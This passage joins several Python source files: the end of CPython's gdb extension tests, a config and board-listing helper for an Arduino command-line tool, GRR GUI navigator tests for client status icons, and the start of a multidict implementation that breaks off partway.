"174, 175, 176, 177, 178, 179, 180, 181, 182, 183, "
"184, 185, 186, 187, 188, 189, 190, 191, 192, 193, "
"194, 195, 196, 197, 198, 199, 200, 201, 202, 203, "
"204, 205, 206, 207, 208, 209, 210, 211, 212, 213, "
"214, 215, 216, 217, 218, 219, 220, 221, 222, 223, "
"224, 225, 226...(truncated)")
self.assertEqual(len(gdb_repr),
1024 + len('...(truncated)'))
def test_builtin_function(self):
gdb_repr, gdb_output = self.get_gdb_repr('print len')
self.assertEqual(gdb_repr, '<built-in function len>')
def test_builtin_method(self):
gdb_repr, gdb_output = self.get_gdb_repr('import sys; print sys.stdout.readlines')
self.assertTrue(re.match('<built-in method readlines of file object at remote 0x[0-9a-f]+>',
gdb_repr),
'Unexpected gdb representation: %r\n%s' % \
(gdb_repr, gdb_output))
def test_frames(self):
gdb_output = self.get_stack_trace('''
def foo(a, b, c):
pass
foo(3, 4, 5)
print foo.__code__''',
breakpoint='PyObject_Print',
cmds_after_breakpoint=['print (PyFrameObject*)(((PyCodeObject*)op)->co_zombieframe)']
)
self.assertTrue(re.match(r'.*\s+\$1 =\s+Frame 0x[0-9a-f]+, for file <string>, line 3, in foo \(\)\s+.*',
gdb_output,
re.DOTALL),
'Unexpected gdb representation: %r\n%s' % (gdb_output, gdb_output))
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
class PyListTests(DebuggerTests):
def assertListing(self, expected, actual):
self.assertEndsWith(actual, expected)
def test_basic_command(self):
'Verify that the "py-list" command works'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-list'])
self.assertListing(' 5 \n'
' 6 def bar(a, b, c):\n'
' 7 baz(a, b, c)\n'
' 8 \n'
' 9 def baz(*args):\n'
' >10 print(42)\n'
' 11 \n'
' 12 foo(1, 2, 3)\n',
bt)
def test_one_abs_arg(self):
'Verify the "py-list" command with one absolute argument'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-list 9'])
self.assertListing(' 9 def baz(*args):\n'
' >10 print(42)\n'
' 11 \n'
' 12 foo(1, 2, 3)\n',
bt)
def test_two_abs_args(self):
'Verify the "py-list" command with two absolute arguments'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-list 1,3'])
self.assertListing(' 1 # Sample script for use by test_gdb.py\n'
' 2 \n'
' 3 def foo(a, b, c):\n',
bt)
class StackNavigationTests(DebuggerTests):
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_pyup_command(self):
'Verify that the "py-up" command works'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-up'])
self.assertMultilineMatches(bt,
r'''^.*
#[0-9]+ Frame 0x[0-9a-f]+, for file .*gdb_sample.py, line 7, in bar \(a=1, b=2, c=3\)
baz\(a, b, c\)
$''')
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
def test_down_at_bottom(self):
'Verify handling of "py-down" at the bottom of the stack'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-down'])
self.assertEndsWith(bt,
'Unable to find a newer python frame\n')
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_up_at_top(self):
'Verify handling of "py-up" at the top of the stack'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-up'] * 4)
self.assertEndsWith(bt,
'Unable to find an older python frame\n')
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_up_then_down(self):
'Verify "py-up" followed by "py-down"'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-up', 'py-down'])
self.assertMultilineMatches(bt,
r'''^.*
#[0-9]+ Frame 0x[0-9a-f]+, for file .*gdb_sample.py, line 7, in bar \(a=1, b=2, c=3\)
baz\(a, b, c\)
#[0-9]+ Frame 0x[0-9a-f]+, for file .*gdb_sample.py, line 10, in baz \(args=\(1, 2, 3\)\)
print\(42\)
$''')
class PyBtTests(DebuggerTests):
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_bt(self):
'Verify that the "py-bt" command works'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-bt'])
self.assertMultilineMatches(bt,
r'''^.*
Traceback \(most recent call first\):
File ".*gdb_sample.py", line 10, in baz
print\(42\)
File ".*gdb_sample.py", line 7, in bar
baz\(a, b, c\)
File ".*gdb_sample.py", line 4, in foo
bar\(a, b, c\)
File ".*gdb_sample.py", line 12, in <module>
foo\(1, 2, 3\)
''')
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_bt_full(self):
'Verify that the "py-bt-full" command works'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-bt-full'])
self.assertMultilineMatches(bt,
r'''^.*
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 7, in bar \(a=1, b=2, c=3\)
baz\(a, b, c\)
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 4, in foo \(a=1, b=2, c=3\)
bar\(a, b, c\)
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 12, in <module> \(\)
foo\(1, 2, 3\)
''')
@unittest.skipUnless(thread,
"Python was compiled without thread support")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_threads(self):
'Verify that "py-bt" indicates threads that are waiting for the GIL'
cmd = '''
from threading import Thread
class TestThread(Thread):
# These threads would run forever, but we'll interrupt things with the
# debugger
def run(self):
i = 0
while 1:
i += 1
t = {}
for i in range(4):
t[i] = TestThread()
t[i].start()
# Trigger a breakpoint on the main thread
print 42
'''
# Verify with "py-bt":
gdb_output = self.get_stack_trace(cmd,
cmds_after_breakpoint=['thread apply all py-bt'])
self.assertIn('Waiting for the GIL', gdb_output)
# Verify with "py-bt-full":
gdb_output = self.get_stack_trace(cmd,
cmds_after_breakpoint=['thread apply all py-bt-full'])
self.assertIn('Waiting for the GIL', gdb_output)
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
# Some older versions of gdb will fail with
# "Cannot find new threads: generic error"
# unless we add LD_PRELOAD=PATH-TO-libpthread.so.1 as a workaround
@unittest.skipUnless(thread,
"Python was compiled without thread support")
def test_gc(self):
'Verify that "py-bt" indicates if a thread is garbage-collecting'
cmd = ('from gc import collect\n'
'print 42\n'
'def foo():\n'
' collect()\n'
'def bar():\n'
' foo()\n'
'bar()\n')
# Verify with "py-bt":
gdb_output = self.get_stack_trace(cmd,
cmds_after_breakpoint=['break update_refs', 'continue', 'py-bt'],
)
self.assertIn('Garbage-collecting', gdb_output)
# Verify with "py-bt-full":
gdb_output = self.get_stack_trace(cmd,
cmds_after_breakpoint=['break update_refs', 'continue', 'py-bt-full'],
)
self.assertIn('Garbage-collecting', gdb_output)
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
# Some older versions of gdb will fail with
# "Cannot find new threads: generic error"
# unless we add LD_PRELOAD=PATH-TO-libpthread.so.1 as a workaround
@unittest.skipUnless(thread,
"Python was compiled without thread support")
def test_pycfunction(self):
'Verify that "py-bt" displays invocations of PyCFunction instances'
# Tested function must not be defined with METH_NOARGS or METH_O,
# otherwise call_function() doesn't call PyCFunction_Call()
cmd = ('from time import gmtime\n'
'def foo():\n'
' gmtime(1)\n'
'def bar():\n'
' foo()\n'
'bar()\n')
# Verify with "py-bt":
gdb_output = self.get_stack_trace(cmd,
breakpoint='time_gmtime',
cmds_after_breakpoint=['bt', 'py-bt'],
)
self.assertIn('<built-in function gmtime', gdb_output)
# Verify with "py-bt-full":
gdb_output = self.get_stack_trace(cmd,
breakpoint='time_gmtime',
cmds_after_breakpoint=['py-bt-full'],
)
self.assertIn('#0 <built-in function gmtime', gdb_output)
class PyPrintTests(DebuggerTests):
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_basic_command(self):
'Verify that the "py-print" command works'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-print args'])
self.assertMultilineMatches(bt,
r".*\nlocal 'args' = \(1, 2, 3\)\n.*")
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_print_after_up(self):
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-up', 'py-print c', 'py-print b', 'py-print a'])
self.assertMultilineMatches(bt,
r".*\nlocal 'c' = 3\nlocal 'b' = 2\nlocal 'a' = 1\n.*")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_printing_global(self):
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-print __name__'])
self.assertMultilineMatches(bt,
r".*\nglobal '__name__' = '__main__'\n.*")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_printing_builtin(self):
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-print len'])
self.assertMultilineMatches(bt,
r".*\nbuiltin 'len' = <built-in function len>\n.*")
class PyLocalsTests(DebuggerTests):
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_basic_command(self):
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-locals'])
self.assertMultilineMatches(bt,
r".*\nargs = \(1, 2, 3\)\n.*")
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_locals_after_up(self):
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-up', 'py-locals'])
self.assertMultilineMatches(bt,
r".*\na = 1\nb = 2\nc = 3\n.*")
def test_main():
if test_support.verbose:
print("GDB version %s.%s:" % (gdb_major_version, gdb_minor_version))
for line in gdb_version.splitlines():
print(" " * 4 + line)
run_unittest(PrettyPrintTests,
PyListTests,
StackNavigationTests,
PyBtTests,
PyPrintTests,
PyLocalsTests
)
if __name__ == "__main__":
test_main()
| |
import os
import sys
import re
import shutil
import subprocess
try:
import serial.tools.list_ports
except ImportError:
list_ports_supported = False
else:
list_ports_supported = True
from sys import platform
from shutil import rmtree
from collections import OrderedDict, namedtuple
from colorama import Fore
# Parameters to be included in .jno
valid_params = {
'exec_dir',
'board',
'port',
'baudrate',
'sketch_dir'
}
# Global jno settings file name
global_file_name = ".jnoglobal.jno"
# Exception class for jno-related exceptions
class JnoException(Exception):
pass
# Replaces temporary dictionary values with actual values
def interpret_configs():
jno_dict = read_configs(get_home_directory(),global_file_name)
# based on operating system, try to use a default location if no exec_dir is set
if jno_dict["exec_dir"] in ('NULL','DEFAULT'):
if os.name == 'nt': # running on Windows
if os.path.isdir("C:/Program Files (x86)/Arduino"):
jno_dict["exec_dir"] = "C:/Program Files (x86)/Arduino"
elif platform == "darwin": # running on OS X
if os.path.isdir("/Applications/Arduino.app"):
jno_dict["exec_dir"] = "/Applications/Arduino.app"
# otherwise, if still don't have a value, raise exception
if jno_dict["exec_dir"] in ('NULL','DEFAULT'):
raise JnoException("exec_dir has not been initialized (use jno setglobal --exec_dir=[Installed Arduino Directory])")
# perform necessary additions/replacements
if jno_dict["sketch_dir"] == 'DEFAULT':
jno_dict["sketch_dir"] = os.getcwd()
# if not absolute directory, make it local
elif not jno_dict["sketch_dir"].startswith('/'):
jno_dict["sketch_dir"] = os.path.join(os.getcwd(),jno_dict["sketch_dir"])
# create EXEC_SCRIPT; if on Windows, uses the better executable
if os.name == 'nt':
jno_dict["EXEC_SCRIPT"] = os.path.join(jno_dict["exec_dir"],'arduino_debug')
elif platform == "darwin": # if on OS X, use proper executable directory
jno_dict["EXEC_SCRIPT"] = os.path.join(jno_dict["exec_dir"],"Contents/MacOS/Arduino")
else:
jno_dict["EXEC_SCRIPT"] = os.path.join(jno_dict["exec_dir"],"arduino")
# create SKETCH_INO
jno_dict["SKETCH_INO"] = os.path.join(jno_dict["sketch_dir"],'sketch/sketch.ino')
# create SKETCH_LIBS
jno_dict["SKETCH_LIBS"] = os.path.join(jno_dict["sketch_dir"],'libraries')
return jno_dict
# Verify that exec_dir is pointing at a valid arduino
def verify_arduino_dir(jno_dict):
exec_dir = jno_dict["exec_dir"]
if not os.path.isdir(exec_dir):
raise JnoException("specified exec_dir is not a valid directory: {}".format(exec_dir))
if platform == "darwin": # running on OS X
revision_file = os.path.join(exec_dir,"Contents/Java/revisions.txt")
else:
revision_file = os.path.join(exec_dir,"revisions.txt")
if not os.path.exists(revision_file):
raise JnoException("specified exec_dir is not pointing at a valid arduino install: {}".format(exec_dir))
# Create global settings in home directory if not created already
def create_global_settings():
if not os.path.exists(os.path.join(get_home_directory(),global_file_name)):
create_default_jno_file(get_home_directory(),global_file_name)
# Write default jno file in desired location
def create_default_jno_file(location,file_name):
with open(os.path.join(location,file_name),'w') as jno:
jno.write("exec_dir==NULL\n")
jno.write("board==uno\n")
jno.write("baudrate==9600\n")
jno.write("port==DEFAULT\n")
jno.write("sketch_dir==DEFAULT\n")
# Parses global and local .jno, returning dictionary
def read_configs(global_location,file_name):
jno_dict = {}
jno_dict = parse_jno_file(jno_dict,global_location,file_name)
if os.path.exists(os.path.join(os.getcwd(),"jno.jno")):
jno_dict = parse_jno_file(jno_dict,os.getcwd())
return jno_dict
# Parses .jno file in given directory, returning dictionary
def parse_jno_file(jno_dict,jno_dir,file_name="jno.jno"):
new_dict = {}
with open(os.path.join(jno_dir,file_name),'r') as jno:
for line in jno:
line = line.strip()
if len(line) == 0:
continue
param,conf_input = line.split('==')
param = param.lower()
if param in valid_params:
new_dict[param] = conf_input
new_keys = new_dict.keys()
for key in new_keys:
if key in jno_dict:
if new_dict[key] in ('NULL','DEFAULT'):
continue
jno_dict[key] = new_dict[key]
return jno_dict
# Cleans selected directory
def clean_directory(dir_to_clean):
# if exists, remove and replace
if os.path.isdir(dir_to_clean):
try:
rmtree(dir_to_clean)
except:
return False
# in either case, make the directory again
try:
os.mkdir(dir_to_clean)
except:
return False
return True
# Run arduino with an assembled argument list stdout=subprocess.PIPE,
def run_arduino_process(arg_list):
try:
call = subprocess.Popen(arg_list, stderr=subprocess.PIPE, universal_newlines=True)
for line in call.stderr:
if line.startswith("TRACE") or line.startswith("DEBUG") or line.startswith("INFO"):
continue
elif line[25:29] == "INFO" or line[25:29] == "WARN":
continue
else:
sys.stdout.write(line)
# wait until call is finished
call.communicate()[0]
except subprocess.CalledProcessError as e:
returned = e.returncode
print(Fore.YELLOW + 'All Actions Complete: {}'.format(return_code_qualifier(call.returncode)) + Fore.RESET)
# Returns meaning of return code
def return_code_qualifier(return_code):
return_code_dict = {
0:Fore.GREEN + "Success",
1:Fore.RED + "Build failed or upload failed",
2:Fore.RED + "Sketch not found",
3:Fore.RED + "Invalid argument for commandline option",
4:Fore.RED + "Preference passed to --get-pref does not exist"
}
return return_code_dict[return_code]
# Create directory for building
def create_build_directory(jno_dict):
build_directory = os.path.join(jno_dict["sketch_dir"],".build")
if not os.path.isdir(build_directory):
os.mkdir(build_directory)
# while we are at it, check if library directory has the right name
lib_dir = os.path.join(jno_dict["sketch_dir"],"libraries")
lib_dir_old = os.path.join(jno_dict["sketch_dir"],"lib")
if os.path.isdir(lib_dir_old):
os.rename(lib_dir_old,lib_dir)
# Get home directory of current user
def get_home_directory():
return os.path.expanduser('~')
# Returns list of common parameters needed for upload/build
def get_common_parameters(jno_dict):
# we are trying to set the build and sketchbook path
build_path = os.path.join(jno_dict["sketch_dir"],".build")
sketchbook_path = jno_dict["sketch_dir"]
pref_string_list = []
argument_list = []
# fill out string list
pref_string_list.append("build.path={}".format(build_path))
pref_string_list.append("sketchbook.path={}".format(sketchbook_path))
# fill out argument list
for pref_string in pref_string_list:
argument_list.append("--pref")
argument_list.append(pref_string)
# return arguments
return argument_list
# Get all ports to connected devices
def get_all_ports():
if list_ports_supported:
return serial.tools.list_ports.comports()
print("port listing is not supported with current version of pyserial")
return None
# Get first port name
def get_first_port_name():
ports = get_all_ports()
if ports:
return ports[0].device
return None
# Check if port exists; if default, use first available port
def verify_and_get_port(port_name,use_first=True):
if port_name == "DEFAULT":
if use_first:
return get_first_port_name()
return None
ports = get_all_ports()
for port in ports:
if port.device == port_name:
return port_name
return None
# Get and print list of all supported models
def get_all_models(jno_dict):
# directores to ignore
ignore_dirs = ["tools"]
# get hardware directory
if platform == "darwin": # if running on a OS X
arduino_hardware_dir = os.path.join(jno_dict["exec_dir"],"Contents/Java/hardware")
else: # running on all other platforms
arduino_hardware_dir = os.path.join(jno_dict["exec_dir"],"hardware")
# used to store all models
all_models = []
# do a walk
directories = next(os.walk(arduino_hardware_dir))[1]
for directory in directories:
# if not an ignored dir, go into it
if directory not in ignore_dirs:
directory_path = os.path.join(arduino_hardware_dir,directory)
subdirectories = next(os.walk(directory_path))[1]
# in each directory here, go into it and do a get_boards... call
for subdir in subdirectories:
subdir_path = os.path.join(directory_path, subdir)
path_prefix = "{}:{}:".format(directory,subdir)
all_models.extend(get_boards_from_directory(subdir_path,path_prefix))
#arduino_hardware_dir = os.path.join(jno_dict["exec_dir"],"hardware/arduino/avr/")
return all_models
# Returns model list from boards.txt in specified directory
def get_boards_from_directory(fileloc,prefix):
# models is a list of Model classes
models = []
with open(os.path.join(fileloc,"boards.txt"),'r') as modelfile:
still_expecting_menu_item_types = True
# list for expected menu item types [(menu_item_type, menu_item_label), ...]
expected_menu_item_types = []
# keep track of current board info
current_model = Model()
for line in modelfile:
# strip the line
line = line.strip()
# skip empty lines
if len(line) == 0:
continue
# at the beginning of the file, we expect to see all the possible menu item types. Collect them
if still_expecting_menu_item_types and current_model.board is None:
menu_type_search_object = re.search("menu.[a-zA-Z0-9_-]*=(.*)", line)
if menu_type_search_object is not None:
# get menu item type + readable label
expected_type_label,expected_readable_label = menu_type_search_object.group(0).split("=")
expected_type_label = expected_type_label.split(".")[1]
expected_menu_item_types.append((expected_type_label, expected_readable_label))
continue
# check if line depicts board name
if ".name=" in line:
# this is not a new menu item type line, so set expectation to False
if still_expecting_menu_item_types:
still_expecting_menu_item_types = False
arduino_label,readable_label = line.strip().split(".name=")
# check if we are on a different type of board now
if current_model.board is not None and arduino_label != current_model.board:
models.append(current_model)
current_model = Model()
# change the current labels
current_model.board = arduino_label
current_model.board_name = readable_label
current_model.initialize_dict(expected_menu_item_types)
current_model.set_prefix(prefix)
# see if it is a different skew of current board type
elif current_model.board is not None:
search_object = re.search(current_model.board+".menu.[a-zA-Z0-9_-]*.[a-zA-Z0-9_-]*=(.*)", line)
if search_object is not None:
# figure out which menu type we got
menu_item_type,menu_item_label = search_object.group(0).split("=")
menu_item_type,menu_item_name = menu_item_type.split(".")[-2:]
# add this menu_item_type + label to the proper item in current_menu_items
current_model.add_menu_item(menu_item_type,menu_item_name,menu_item_label)
# add last entry
if current_model.board is not None:
models.append(current_model)
current_model = Model()
return models
# Get help string for command
def formatted_help_string(command, surround=False):
return """{8}{3}{0}:
{4}Usage:{6} {1}
{4}Description:{5} {2}{9}{7}""".format(
command.help_name,command.help_usage,command.help_description,
Fore.YELLOW,Fore.CYAN,Fore.MAGENTA,Fore.GREEN,Fore.RESET,
Fore.CYAN+"======================\n" if surround else "",
Fore.CYAN+"\n======================" if surround else "")
# A named tuple used to represent a specific menu item
MenuItem = namedtuple("MenuItem", ["name","label"])
# ModelData that is used to store label and all the subitems
class ModelData(object):
def __init__(self, label):
self.label = label
self.items = []
self.empty = True
def is_empty(self):
return self.empty
def append(self, item):
self.items.append(item)
self.empty = False
def get_first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
def __str__(self):
return "'ModelData with Label: {} and Items: {}'".format(self.label,self.items)
def __repr__(self):
return str(self)
# Model that stores data for a particular arduino board
class Model(object):
def __init__(self):
self.board = None
self.board_name = None
self.menu_item_dict = OrderedDict()
self.empty = True
self.argument_prefix = ""
# initialize menu item dictionary
def initialize_dict(self, expected_menu_list):
for menu_item_type,menu_item_label in expected_menu_list:
self.menu_item_dict[menu_item_type] = ModelData(menu_item_label)
# check if there are no items added to the dictionary
def is_empty(self):
return self.empty
# set and get prefix
def set_prefix(self, prefix):
self.argument_prefix = prefix
def get_prefix(self):
return self.argument_prefix
# add a menu item for a particular type
def add_menu_item(self, menu_item_type, menu_item_name, menu_item_label):
self.menu_item_dict[menu_item_type].append(MenuItem(menu_item_name,menu_item_label))
self.empty = False
def __str__(self):
return "Model with board: {}, board_name: {}, and item dict: {}".format(self.board,self.board_name,self.menu_item_dict)
def __repr__(self):
return str(self)
| |
#!/usr/bin/env python
"""Navigator view tests."""
from grr.gui import gui_test_lib
from grr.gui import runtests_test
from grr.lib import aff4
from grr.lib import flags
from grr.lib import rdfvalue
from grr.lib import test_lib
from grr.lib.rdfvalues import client as rdf_client
class TestNavigatorView(gui_test_lib.SearchClientTestBase):
"""Tests for NavigatorView (left side bar)."""
def CreateClient(self, last_ping=None):
if last_ping is None:
last_ping = rdfvalue.RDFDatetime.Now()
with self.ACLChecksDisabled():
client_id = self.SetupClients(1)[0]
with aff4.FACTORY.Open(
client_id, mode="rw", token=self.token) as client_obj:
client_obj.Set(client_obj.Schema.PING(last_ping))
self.RequestAndGrantClientApproval(client_id)
client_obj = aff4.FACTORY.Open(client_id, token=self.token)
return client_id
def RecordCrash(self, client_id, timestamp):
with test_lib.FakeTime(timestamp):
client = test_lib.CrashClientMock(client_id, self.token)
for _ in test_lib.TestFlowHelper(
test_lib.FlowWithOneClientRequest.__name__,
client,
client_id=client_id,
token=self.token,
check_flow_errors=False):
pass
def CreateClientWithVolumes(self, available=50):
with self.ACLChecksDisabled():
client_id = self.SetupClients(1)[0]
with aff4.FACTORY.Open(
client_id, mode="rw", token=self.token) as client_obj:
volume = rdf_client.Volume(
total_allocation_units=100,
actual_available_allocation_units=available)
client_obj.Set(client_obj.Schema.VOLUMES([volume]))
self.RequestAndGrantClientApproval(client_id)
client_obj = aff4.FACTORY.Open(client_id, token=self.token)
return client_id
def testReasonIsShown(self):
client_id = self.CreateClient()
self.Open("/#c=" + str(client_id))
self.WaitUntil(self.IsTextPresent, "Access reason: " + self.token.reason)
def testOnlineClientStatus(self):
client_id = self.CreateClient()
self.Open("/#c=" + str(client_id))
self.WaitUntil(self.IsElementPresent, "css=img[src$='online.png']")
def testOneDayClientStatus(self):
client_id = self.CreateClient(
last_ping=rdfvalue.RDFDatetime.Now() - rdfvalue.Duration("1h"))
self.Open("/#c=" + str(client_id))
self.WaitUntil(self.IsElementPresent, "css=img[src$='online-1d.png']")
def testOfflineClientStatus(self):
client_id = self.CreateClient(
last_ping=rdfvalue.RDFDatetime.Now() - rdfvalue.Duration("1d"))
self.Open("/#c=" + str(client_id))
self.WaitUntil(self.IsElementPresent, "css=img[src$='offline.png']")
def testOnlineClientStatusInClientSearch(self):
client_id = self.CreateClient()
self.Open("/")
self.Type("client_query", client_id.Basename())
self.Click("client_query_submit")
self.WaitUntil(self.IsElementPresent, "css=tr:contains('%s') "
"img[src$='online.png']" % client_id.Basename())
def testOneDayClientStatusInClientSearch(self):
client_id = self.CreateClient(
last_ping=rdfvalue.RDFDatetime.Now() - rdfvalue.Duration("1h"))
self.Open("/")
self.Type("client_query", client_id.Basename())
self.Click("client_query_submit")
self.WaitUntil(self.IsElementPresent, "css=tr:contains('%s') "
"img[src$='online-1d.png']" % client_id.Basename())
def testOfflineClientStatusInClientSearch(self):
client_id = self.CreateClient(
last_ping=rdfvalue.RDFDatetime.Now() - rdfvalue.Duration("1d"))
self.Open("/")
self.Type("client_query", client_id.Basename())
self.Click("client_query_submit")
self.WaitUntil(self.IsElementPresent, "css=tr:contains('%s') "
"img[src$='offline.png']" % client_id.Basename())
def testLatestCrashesStatusIsNotDisplayedWhenThereAreNoCrashes(self):
client_id = self.CreateClient()
self.Open("/#c=" + str(client_id))
self.WaitUntil(self.IsTextPresent, "Host-0")
self.WaitUntilNot(self.IsTextPresent, "Last crash")
def testCrashIsDisplayedInClientStatus(self):
timestamp = rdfvalue.RDFDatetime.Now()
client_id = self.CreateClient(last_ping=timestamp)
with self.ACLChecksDisabled():
self.RecordCrash(client_id, timestamp - rdfvalue.Duration("5s"))
self.RequestAndGrantClientApproval(client_id)
self.Open("/#c=" + str(client_id))
self.WaitUntil(self.IsTextPresent, "Last crash")
self.WaitUntilContains("seconds", self.GetText,
"css=grr-client-summary .last-crash")
def testOnlyTheLatestCrashIsDisplayed(self):
timestamp = rdfvalue.RDFDatetime.Now()
client_id = self.CreateClient(last_ping=timestamp)
with self.ACLChecksDisabled():
self.RecordCrash(client_id, timestamp - rdfvalue.Duration("2h"))
self.RecordCrash(client_id, timestamp - rdfvalue.Duration("5s"))
self.RequestAndGrantClientApproval(client_id)
self.Open("/#c=" + str(client_id))
self.WaitUntil(self.IsTextPresent, "Last crash")
self.WaitUntilContains("seconds", self.GetText,
"css=grr-client-summary .last-crash")
def testOnlyCrashesHappenedInPastWeekAreDisplayed(self):
timestamp = rdfvalue.RDFDatetime.Now()
client_id = self.CreateClient(last_ping=timestamp)
with self.ACLChecksDisabled():
self.RecordCrash(client_id, timestamp - rdfvalue.Duration("8d"))
self.RequestAndGrantClientApproval(client_id)
self.Open("/#c=" + str(client_id))
self.WaitUntil(self.IsTextPresent, "Host-0")
# This one is not displayed, because it happened more than 24 hours ago.
self.WaitUntilNot(self.IsTextPresent, "Last crash")
def testCrashIconDoesNotAppearInClientSearchWhenClientDidNotCrash(self):
client_id = self.CreateClient()
self.Open("/")
self.Type("client_query", client_id.Basename())
self.Click("client_query_submit")
# There should be a result row with the client id.
self.WaitUntil(self.IsElementPresent,
"css=tr:contains('%s')" % client_id.Basename())
# But it shouldn't have the skull.
self.WaitUntilNot(self.IsElementPresent, "css=tr:contains('%s') "
"img[src$='skull-icon.png']" % client_id.Basename())
def testCrashIconDoesNotAppearInClientSearchIfClientCrashedLongTimeAgo(self):
client_id = self.CreateClient()
with self.ACLChecksDisabled():
self.RecordCrash(client_id,
rdfvalue.RDFDatetime.Now() - rdfvalue.Duration("25h"))
self.Open("/")
self.Type("client_query", client_id.Basename())
self.Click("client_query_submit")
# There should be a result row with the client id.
self.WaitUntil(self.IsElementPresent,
"css=tr:contains('%s')" % client_id.Basename())
# But it shouldn't have the skull.
self.WaitUntilNot(self.IsElementPresent, "css=tr:contains('%s') "
"img[src$='skull-icon.png']" % client_id.Basename())
def testCrashIconAppearsInClientSearchIfClientCrashedRecently(self):
timestamp = rdfvalue.RDFDatetime.Now()
client_id = self.CreateClient()
with self.ACLChecksDisabled():
self.RecordCrash(client_id, timestamp)
self.Open("/")
self.Type("client_query", client_id.Basename())
self.Click("client_query_submit")
# There should be a result row with the client id.
self.WaitUntil(self.IsElementPresent,
"css=tr:contains('%s')" % client_id.Basename())
# And it should have the skull.
self.WaitUntil(self.IsElementPresent, "css=tr:contains('%s') "
"img[src$='skull-icon.png']" % client_id.Basename())
def testDiskIconDoesNotAppearInClientSearchIfDiskIsNotFull(self):
client_id = self.CreateClientWithVolumes()
self.Open("/")
self.Type("client_query", client_id.Basename())
self.Click("client_query_submit")
# There should be a result row with the client id.
self.WaitUntil(self.IsElementPresent,
"css=tr:contains('%s')" % client_id.Basename())
# But it shouldn't have the disk icon.
self.WaitUntilNot(self.IsElementPresent, "css=tr:contains('%s') "
"img[src$='hdd-bang-icon.png']" % client_id.Basename())
def testDiskIconDoesAppearsInClientSearchIfDiskIsFull(self):
client_id = self.CreateClientWithVolumes(available=1)
self.Open("/")
self.Type("client_query", client_id.Basename())
self.Click("client_query_submit")
# There should be a result row with the client id.
self.WaitUntil(self.IsElementPresent,
"css=tr:contains('%s')" % client_id.Basename())
# With the disk icon.
self.WaitUntil(self.IsElementPresent, "css=tr:contains('%s') "
"img[src$='hdd-bang-icon.png']" % client_id.Basename())
def testDiskWarningIsNotDisplayed(self):
client_id = self.CreateClientWithVolumes()
self.Open("/#c=" + str(client_id))
self.WaitUntil(self.IsTextPresent, "Host-0")
self.WaitUntilNot(self.IsTextPresent, "Disk free space")
def testDiskWarningIsDisplayed(self):
client_id = self.CreateClientWithVolumes(available=1)
self.Open("/#c=" + str(client_id))
self.WaitUntil(self.IsTextPresent, "Host-0")
self.WaitUntil(self.IsTextPresent, "Disk free space")
def main(argv):
# Run the full test suite
runtests_test.SeleniumTestProgram(argv=argv)
if __name__ == "__main__":
flags.StartMain(main)
| |
"""Multidict implementation.
HTTP Headers and URL query string require specific data structure:
multidict. It behaves mostly like a dict but it can have
several values for the same key.
"""
from builtins import str
__all__ = ('MultiDict', 'MultiDictProxy', 'CIMultiDict')
_marker = object()
class _Base(object):
isCI = False
def getall(self, key, default=_marker):
"""Return a list of all values matching the key."""
res = [v for k, v in self._items if k == key]
if res:
return res
if not res and default is not _marker:
return default
raise KeyError('Key not found: %r' % key)
def getone(self, key, default=_marker):
"""Get first value matching the key."""
for k, v in self._items:
if k == key:
return v
if default is not _marker:
return default
raise KeyError('Key not found: %r' % key)
# Mapping interface #
def __getitem__(self, key):
return self.getone(key, _marker)
def get(self, key, default=None):
"""Get first value matching the key.
The method is alias for .getone().
"""
return self.getone(key, default)
def __iter__(self):
return iter(self.keys())
def __len__(self):
return len(self._items)
def keys(self):
"""Return a new view of the dictionary's keys."""
return _KeysView(self._items, isCI=self.isCI)
def items(self):
"""Return a new view of the dictionary's items *(key, value) pairs)."""
return _ItemsView(self._items)
def values(self):
